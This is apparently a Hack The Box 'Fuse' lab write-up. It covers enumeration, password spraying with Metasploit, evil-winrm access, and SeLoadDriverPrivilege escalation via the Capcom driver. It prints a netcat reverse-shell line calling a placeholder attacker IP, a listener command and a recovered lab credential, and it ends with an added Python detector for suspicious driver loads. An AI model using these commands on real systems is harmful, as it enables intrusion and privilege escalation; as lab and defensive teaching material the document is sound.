Enumeration:
Let's start with what's open on the box and what we can exploit. A quick nmap scan gives us:
nmap -T4 -p- -A 10.10.10.193

Holy Fu@k, so many ports. I usually start with port 80. By going to the webpage I noticed that the URL is weird, so I decided to add it to /etc/hosts.


OK, so now we have a website. I started browsing around, hoping I could use something. Then I started seeing some users that had used the specific printer.

I made a list of all users. You can check it below:
pmerton, tlavel, sthompson, bhult, administrator
Well, time to collect some passwords, because now we have a bunch of users and 0 passwords. A method that was recommended to me was to use cewl:
cewl -d 5 -m 3 -w pass.lst http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers
Time to see if this password list will let us mount some of the SMB shares. For this purpose I would use smb_login from Metasploit. Here you need to set RHOST, user_file (the users mentioned above) and pass_file (the file we generated with cewl).
Two potential entry points were found:


After trying to log in with both, well... that failed.

What we can do is try to change the password. Follow the command. My new password is the same, just with 02 instead of 01.

After changing the password we can use rpcclient to login and enumerate a bit more.

Save all the new users in the user.list file that we made earlier. Let's check for printers.

USER:
Holy shit, here we go, we got one password. It does not say for which user, but using this password with the updated user list in Metasploit we can try to figure that out. The Metasploit module that we are going to use is winrm_login.

And we have a result:

[+] 10.10.10.193:5985 - Login Successful: WORKSTATION\svc-print:$fab@s3Rv1ce$1
Please follow the instructions and get evil-winrm. Here is the link:
https://github.com/Hackplayers/evil-winrm

After some directory traversing I managed to find the user flag.
ROOT:
Now let's start enumerating for root. Here are two quick commands:
whoami
whoami /all

To be able to get root I would suggest taking a good look at the following links:
https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
The needed CPP files: File1 and File2
You need to compile the files. After that, what needs to be done is to transfer the files into C:\temp. Take a look at the picture below and you will see which files you need to have in this folder.

The content of netcat.bat is:
c:\temp\nc.exe YOUR_HTB_IP 2222 -e cmd.exe
After you have transferred all the files from your local machine to FUSE, run the following commands on FUSE in the temp folder.
.\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys
.\ExploitCapcom_modded.exe
Meanwhile, you need to have a listener up on your local machine. I use rlwrap. If you don't have it installed you can read HERE.
rlwrap nc -nvlp 2222
The port in the command above should be the same as the port in netcat.bat.
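As an added defender-side example (not part of the original write-up): the two commands above load a kernel driver from C:\temp instead of the normal system driver directory, which is exactly the kind of event a blue team can alert on. The script below assumes a simplified "key=value; key=value" line format loosely modelled on the Sysmon Event ID 6 (Driver loaded) fields; the sample events are constructed, not real telemetry.

```python
"""Flag kernel driver loads from unusual locations or without a valid signature."""
from typing import Dict, List

# Constructed sample events in a simplified key=value form modelled on
# Sysmon Event ID 6 (Driver loaded) fields. Not real telemetry.
SAMPLE_EVENTS = [
    "UtcTime=2020-06-01 10:01:02; ImageLoaded=C:\\Windows\\System32\\drivers\\tcpip.sys; "
    "Signed=true; Signature=Microsoft Windows; SignatureStatus=Valid",
    "UtcTime=2020-06-01 10:02:15; ImageLoaded=C:\\temp\\capcom.sys; "
    "Signed=true; Signature=CAPCOM Co., Ltd.; SignatureStatus=Valid",
    "UtcTime=2020-06-01 10:03:40; ImageLoaded=C:\\Windows\\System32\\drivers\\evil.sys; "
    "Signed=false; Signature=; SignatureStatus=Unavailable",
]

# Directories from which drivers are normally loaded (assumption: adjust per environment).
TRUSTED_DIRS = (
    "c:\\windows\\system32\\drivers\\",
    "c:\\windows\\system32\\driverstore\\",
)


def parse_event(line: str) -> Dict[str, str]:
    """Split one 'k=v; k=v' line into a field dictionary."""
    fields: Dict[str, str] = {}
    for part in line.split("; "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def suspicious_reasons(event: Dict[str, str]) -> List[str]:
    """Return the reasons (if any) why this driver load deserves attention."""
    reasons = []
    path = event.get("ImageLoaded", "").lower()
    if not path.startswith(TRUSTED_DIRS):
        reasons.append("driver loaded from outside the system driver directories")
    signed = event.get("Signed", "").lower() == "true"
    valid = event.get("SignatureStatus", "").lower() == "valid"
    if not (signed and valid):
        reasons.append("driver signature missing or invalid")
    return reasons


def find_suspicious_driver_loads(lines: List[str]) -> List[Dict[str, object]]:
    """Run the checks over a batch of event lines and collect the hits."""
    hits = []
    for line in lines:
        event = parse_event(line)
        reasons = suspicious_reasons(event)
        if reasons:
            hits.append({"time": event.get("UtcTime"), "driver": event.get("ImageLoaded"), "reasons": reasons})
    return hits
```

A validly signed third-party driver loaded from a user-writable directory still triggers the path rule, which is the point: the signature alone is not what makes the load legitimate.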
I hope you enjoyed the write-up. I am not so good on Windows boxes, so maybe the root part is a bit chaotic.